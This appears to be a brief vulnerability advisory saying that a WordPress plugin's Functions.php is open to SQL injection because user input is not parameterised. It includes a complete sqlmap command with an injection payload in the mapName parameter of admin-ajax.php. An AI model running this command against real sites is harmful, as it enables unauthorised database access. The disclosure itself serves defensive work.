The code in Functions.php is vulnerable to SQL Injection because they are not parameterising or sanitising user input.
sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIEHERE --level=5 --risk=3